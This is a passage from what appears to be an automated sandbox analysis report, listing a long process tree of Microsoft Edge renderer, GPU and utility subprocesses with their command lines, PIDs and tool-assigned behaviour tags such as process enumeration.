  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2000,1778565969047659327,12781919744486910821,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3692 /prefetch:1
  2⤵
  PID:4156
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2000,1778565969047659327,12781919744486910821,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5144 /prefetch:2
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:5092
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2000,1778565969047659327,12781919744486910821,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4404 /prefetch:1
  2⤵
  PID:5940
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2000,1778565969047659327,12781919744486910821,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5112 /prefetch:1
  2⤵
  PID:2692
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2000,1778565969047659327,12781919744486910821,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5208 /prefetch:1
  2⤵
  PID:3300
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2000,1778565969047659327,12781919744486910821,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4524 /prefetch:1
  2⤵
  PID:1876
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2000,1778565969047659327,12781919744486910821,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5216 /prefetch:1
  2⤵
  PID:1264
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2000,1778565969047659327,12781919744486910821,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6052 /prefetch:1
  2⤵
  PID:4008
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2000,1778565969047659327,12781919744486910821,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=6732 /prefetch:8
  2⤵
  PID:4788
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=2000,1778565969047659327,12781919744486910821,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=5412 /prefetch:8
  2⤵
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  PID:1092
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2000,1778565969047659327,12781919744486910821,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5488 /prefetch:1
  2⤵
  PID:4508
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2000,1778565969047659327,12781919744486910821,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3100 /prefetch:1
  2⤵
  PID:1776
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2000,1778565969047659327,12781919744486910821,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6924 /prefetch:1
  2⤵
  PID:5492
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2000,1778565969047659327,12781919744486910821,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2008 /prefetch:1
  2⤵
  PID:3612
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2000,1778565969047659327,12781919744486910821,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=45 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6616 /prefetch:1
  2⤵
  PID:1984
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2000,1778565969047659327,12781919744486910821,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=46 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6964 /prefetch:1
  2⤵
  PID:3532
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2000,1778565969047659327,12781919744486910821,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=47 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3608 /prefetch:1
  2⤵
  PID:4392
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2000,1778565969047659327,12781919744486910821,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=48 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6212 /prefetch:1
  2⤵
  PID:4908
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2000,1778565969047659327,12781919744486910821,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=49 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7244 /prefetch:1
  2⤵
  PID:4648
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2000,1778565969047659327,12781919744486910821,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=50 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6052 /prefetch:1
  2⤵
  PID:2964
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2000,1778565969047659327,12781919744486910821,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=51 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5368 /prefetch:1
  2⤵
  PID:1700
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2000,1778565969047659327,12781919744486910821,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=52 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7756 /prefetch:1
  2⤵
  PID:5248
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2000,1778565969047659327,12781919744486910821,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=53 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7736 /prefetch:1
  2⤵
  PID:396
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2000,1778565969047659327,12781919744486910821,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=54 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6396 /prefetch:1
  2⤵
  PID:3284
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2000,1778565969047659327,12781919744486910821,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=7400 /prefetch:8
  2⤵
  PID:1980
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2000,1778565969047659327,12781919744486910821,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=57 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6008 /prefetch:1
  2⤵
  PID:3724
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2000,1778565969047659327,12781919744486910821,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7672 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2172
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2000,1778565969047659327,12781919744486910821,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=59 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7920 /prefetch:1
  2⤵
  PID:3924
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2000,1778565969047659327,12781919744486910821,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=60 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8104 /prefetch:1
  2⤵
  PID:5316
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2000,1778565969047659327,12781919744486910821,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=61 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6516 /prefetch:1
  2⤵
  PID:2568
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2000,1778565969047659327,12781919744486910821,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=62 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3176 /prefetch:1
  2⤵
  PID:4736
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2000,1778565969047659327,12781919744486910821,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=63 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8564 /prefetch:1
  2⤵
  PID:5744
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2000,1778565969047659327,12781919744486910821,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=64 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6392 /prefetch:1
  2⤵
  PID:5924
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2000,1778565969047659327,12781919744486910821,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=65 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2764 /prefetch:1
  2⤵
  PID:4264
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2000,1778565969047659327,12781919744486910821,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=66 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6428 /prefetch:1
  2⤵
  PID:2308
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2000,1778565969047659327,12781919744486910821,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=67 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8472 /prefetch:1
  2⤵
  PID:1628
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2000,1778565969047659327,12781919744486910821,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=68 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8992 /prefetch:1
  2⤵
  PID:5244
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2000,1778565969047659327,12781919744486910821,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=69 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8848 /prefetch:1
  2⤵
  PID:4472
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2000,1778565969047659327,12781919744486910821,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=70 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6420 /prefetch:1
  2⤵
  PID:5748
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2000,1778565969047659327,12781919744486910821,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=71 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9200 /prefetch:1
  2⤵
  PID:2960
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2000,1778565969047659327,12781919744486910821,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=72 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8460 /prefetch:1
  2⤵
  PID:3748
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2000,1778565969047659327,12781919744486910821,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=73 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5508 /prefetch:1
  2⤵
  PID:3740
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2000,1778565969047659327,12781919744486910821,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=74 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7140 /prefetch:1
  2⤵
  PID:1824
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2000,1778565969047659327,12781919744486910821,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=75 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5396 /prefetch:1
  2⤵
  PID:4600
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2000,1778565969047659327,12781919744486910821,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=76 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9120 /prefetch:1
  2⤵
  PID:3720
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2000,1778565969047659327,12781919744486910821,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=77 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6292 /prefetch:1
  2⤵
  PID:3056
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2000,1778565969047659327,12781919744486910821,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=78 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8552 /prefetch:1
  2⤵
  PID:2480
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2000,1778565969047659327,12781919744486910821,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=79 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6344 /prefetch:1
  2⤵
  PID:1868
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2000,1778565969047659327,12781919744486910821,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=80 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8388 /prefetch:1
  2⤵
  PID:4872
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2000,1778565969047659327,12781919744486910821,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=81 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5076 /prefetch:1
  2⤵
  PID:2040
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2000,1778565969047659327,12781919744486910821,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=82 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5964 /prefetch:1
  2⤵
  PID:5244
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2000,1778565969047659327,12781919744486910821,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=83 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1928 /prefetch:1
  2⤵
  PID:1700
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2000,1778565969047659327,12781919744486910821,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=84 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2576 /prefetch:1
  2⤵
  PID:320
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2000,1778565969047659327,12781919744486910821,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=85 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8556 /prefetch:1
  2⤵
  PID:5784
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2000,1778565969047659327,12781919744486910821,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=86 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3172 /prefetch:1
  2⤵
  PID:5824
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2000,1778565969047659327,12781919744486910821,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=87 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9072 /prefetch:1
  2⤵
  PID:220
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2000,1778565969047659327,12781919744486910821,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=88 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7076 /prefetch:1
  2⤵
  PID:5716
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2000,1778565969047659327,12781919744486910821,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=89 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5260 /prefetch:1
  2⤵
  PID:2344
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2000,1778565969047659327,12781919744486910821,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=90 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4424 /prefetch:1
  2⤵
  PID:5364
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2000,1778565969047659327,12781919744486910821,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=91 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4564 /prefetch:1
  2⤵
  PID:2684
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2000,1778565969047659327,12781919744486910821,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=92 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8020 /prefetch:1
  2⤵
  PID:728
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2000,1778565969047659327,12781919744486910821,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=93 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5604 /prefetch:1
  2⤵
  PID:5980
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2000,1778565969047659327,12781919744486910821,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=94 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6512 /prefetch:1
  2⤵
  PID:3696
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2000,1778565969047659327,12781919744486910821,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=95 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6928 /prefetch:1
  2⤵
  PID:2660
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2000,1778565969047659327,12781919744486910821,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=96 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7156 /prefetch:1
  2⤵
  PID:1364
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
